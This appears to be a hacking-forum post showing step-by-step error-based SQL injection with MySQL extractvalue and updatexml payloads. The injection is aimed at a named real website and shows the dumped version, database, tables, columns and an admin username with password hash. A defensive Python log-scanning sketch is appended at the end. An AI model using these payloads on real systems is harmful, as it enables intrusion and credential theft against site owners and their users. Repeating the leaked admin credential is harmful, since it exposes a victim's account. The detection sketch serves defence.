- First, extract the basic info:
and extractvalue(rand(),concat(0x0a,version()))-- -
XPATH syntax error: '5.1.57'
and extractvalue(rand(),concat(0x0a,database()))-- -
XPATH syntax error: 'zyabskhu_mega'
- Extract the tables:
and extractvalue(rand(),concat(0x0a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))-- -
adm_members, config,...
- As you increase to limit 1,1 or limit 2,1, the other tables show up.
- Extract the columns (taken from adm_members):
and extractvalue(rand(),concat(0x0a,(select concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x61646d5f6d656d62657273 limit 0,1)))-- -
id, username, password....
- Extract data from the columns:
and extractvalue(rand(),concat(0x0a,(select concat(username,0x7c,password) from adm_members limit 0,1)))-- -
admin|qsnoweyMuNFQIyJzPRO2R2pKB
=> There is one more XPath variant, updatexml, which will be posted later.
----------------------------updatexml part-------------------------------------------
Victim : http://vietbuy.biz/index.php?mod=st&id=1
Method:
extractvalue
updatexml
Get version(), database(), user()
Code:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)-- -
Code:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))--
MySQL Error: XPATH syntax error: '|5.1.57|vnbirbrx_mega|vnbirbrx_m'
Get table_name:
Code:
http://vietbuy.biz/index.php?mod=st&id=1 and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))--
Code:
http://vietbuy.biz/index.php?mod=st&id=1 and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
MySQL Error: XPATH syntax error: '|adm_members'
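
Seen from the defending side, the requests above leave a recognizable trace: an extractvalue( or updatexml( call in the query string next to concat/select, and an "XPATH syntax error" string in the response. The following detection sketch is an added example, not part of the original post; the access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# MySQL XML functions whose XPath argument the payloads above make invalid.
XPATH_FUNC = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
# The error only carries data when that argument is built from a query.
DATA_HINT = re.compile(
    r"\bconcat\s*\(|\bselect\b|information_schema|\b(?:version|database|user)\s*\(\s*\)",
    re.I)
# Error text that reaches the client when the application echoes MySQL errors.
LEAK = re.compile(r"XPATH syntax error: '([^']*)'")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(query):
    """URL-decode until stable (max 3 rounds) and collapse whitespace."""
    for _ in range(3):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return re.sub(r"\s+", " ", query)

def scan_access_log(lines):
    """Return (client, function) for requests whose query string calls an
    XPath function on data built with concat/select/version() and similar."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, uri = m.groups()
        query = normalize(urlsplit(uri).query)
        func = XPATH_FUNC.search(query)
        if func and DATA_HINT.search(query):
            hits.append((client, func.group(1).lower()))
    return hits

def leaked_value(body):
    """Return the string exposed by an echoed XPATH error, or None."""
    m = LEAK.search(body)
    return m.group(1) if m else None

# Constructed sample lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?mod=st&id=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?mod=st&id=1%20and%20extractvalue(rand(),concat(0x7c,version()))--%20- HTTP/1.1" 200 312',
    '198.51.100.4 - - [01/Jan/2024:10:02:30 +0000] "GET /index.php?mod=st&id=1+AND+UpdateXML(0,concat(0x7c,database()),0)--+- HTTP/1.1" 200 298',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /docs.php?q=how+to+use+updatexml+in+mysql HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

A non-None result from leaked_value() on a response body means database errors are being shown to clients; parameterized queries for the id parameter and disabling error display close both the injection and the leak.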